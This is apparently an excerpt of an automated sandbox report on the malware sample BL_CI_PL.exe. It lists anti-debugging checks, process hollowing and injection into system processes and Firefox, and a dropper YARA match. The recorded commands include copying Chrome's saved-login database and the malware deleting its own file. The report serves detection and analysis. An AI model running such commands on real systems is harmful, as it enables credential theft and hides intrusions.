        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEDFA mov eax, dword ptr fs:[00000030h]10_2_1E8AEDFA
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97CDEB mov eax, dword ptr fs:[00000030h]10_2_1E97CDEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97CDEB mov eax, dword ptr fs:[00000030h]10_2_1E97CDEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0D01 mov eax, dword ptr fs:[00000030h]10_2_1E8D0D01
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCD10 mov eax, dword ptr fs:[00000030h]10_2_1E8DCD10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCD10 mov ecx, dword ptr fs:[00000030h]10_2_1E8DCD10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BD08 mov eax, dword ptr fs:[00000030h]10_2_1E96BD08
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BD08 mov eax, dword ptr fs:[00000030h]10_2_1E96BD08
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E948D0A mov eax, dword ptr fs:[00000030h]10_2_1E948D0A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFD20 mov eax, dword ptr fs:[00000030h]10_2_1E8AFD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov ecx, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov ecx, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931D5E mov eax, dword ptr fs:[00000030h]10_2_1E931D5E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92CD40 mov eax, dword ptr fs:[00000030h]10_2_1E92CD40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92CD40 mov eax, dword ptr fs:[00000030h]10_2_1E92CD40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984D4B mov eax, dword ptr fs:[00000030h]10_2_1E984D4B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975D43 mov eax, dword ptr fs:[00000030h]10_2_1E975D43
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975D43 mov eax, dword ptr fs:[00000030h]10_2_1E975D43
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8B1D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8B1D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C5D60 mov eax, dword ptr fs:[00000030h]10_2_1E8C5D60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956D79 mov esi, dword ptr fs:[00000030h]10_2_1E956D79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E985D65 mov eax, dword ptr fs:[00000030h]10_2_1E985D65
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8EBD71
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8EBD71
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABA80 mov eax, dword ptr fs:[00000030h]10_2_1E8ABA80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E966A80 mov eax, dword ptr fs:[00000030h]10_2_1E966A80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E957ABE mov eax, dword ptr fs:[00000030h]10_2_1E957ABE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96DAAF mov eax, dword ptr fs:[00000030h]10_2_1E96DAAF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8C0ACE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8C0ACE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFAEC mov edi, dword ptr fs:[00000030h]10_2_1E8AFAEC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B9AE4 mov eax, dword ptr fs:[00000030h]10_2_1E8B9AE4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984AE8 mov eax, dword ptr fs:[00000030h]10_2_1E984AE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8EAA0E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8EAA0E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DA31 mov eax, dword ptr fs:[00000030h]10_2_1E93DA31
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96DA30 mov eax, dword ptr fs:[00000030h]10_2_1E96DA30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov edx, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8B1A24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8B1A24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934A57 mov eax, dword ptr fs:[00000030h]10_2_1E934A57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934A57 mov eax, dword ptr fs:[00000030h]10_2_1E934A57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8E9A48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8E9A48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8DEA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8DEA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFA44 mov ecx, dword ptr fs:[00000030h]10_2_1E8AFA44
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DA40 mov eax, dword ptr fs:[00000030h]10_2_1E93DA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E94AA40 mov eax, dword ptr fs:[00000030h]10_2_1E94AA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E94AA40 mov eax, dword ptr fs:[00000030h]10_2_1E94AA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931B93 mov eax, dword ptr fs:[00000030h]10_2_1E931B93
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DB90 mov eax, dword ptr fs:[00000030h]10_2_1E93DB90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1B80 mov eax, dword ptr fs:[00000030h]10_2_1E8C1B80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E1B9C mov eax, dword ptr fs:[00000030h]10_2_1E8E1B9C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8AEBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956BDE mov ebx, dword ptr fs:[00000030h]10_2_1E956BDE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956BDE mov eax, dword ptr fs:[00000030h]10_2_1E956BDE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FBC2 mov eax, dword ptr fs:[00000030h]10_2_1E92FBC2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8D8BD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8D8BD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8C1BE7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8C1BE7
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
        Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk

        HIPS / PFW / Operating System Protection Evasion:

        Benign windows process drops PE files
        Source: C:\Windows\explorer.exe File created: k4n8p7lb.exe.13.dr
        System process connects to network (likely due to code injection or exploit)
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2E0000
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: CC0000
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 7C0000
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\ipconfig.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF710730000
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\ipconfig.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF710730000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Thread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Thread register set: target process: 4528
        Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 4528
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Thread register set: target process: 4528
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Process created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Process created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: explorer.exe, ipconfig.exe, wscript.exe, k4n8p7lb.exe (memory dumps) Binary or memory string: Program Manager
        Source: explorer.exe, ipconfig.exe, wscript.exe, k4n8p7lb.exe (memory dumps) Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, ipconfig.exe, wscript.exe, k4n8p7lb.exe (memory dumps) Binary or memory string: Progman
        Source: explorer.exe, ipconfig.exe, wscript.exe, k4n8p7lb.exe (memory dumps) Binary or memory string: Progmanlock
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Generic Dropper
        Source: Yara match File source: Process Memory Space: BL_CI_PL.exe PID: 432, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: ipconfig.exe PID: 4888, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: k4n8p7lb.exe PID: 3200, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: k4n8p7lb.exe PID: 5788, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: NETSTAT.EXE PID: 4520, type: MEMORYSTR
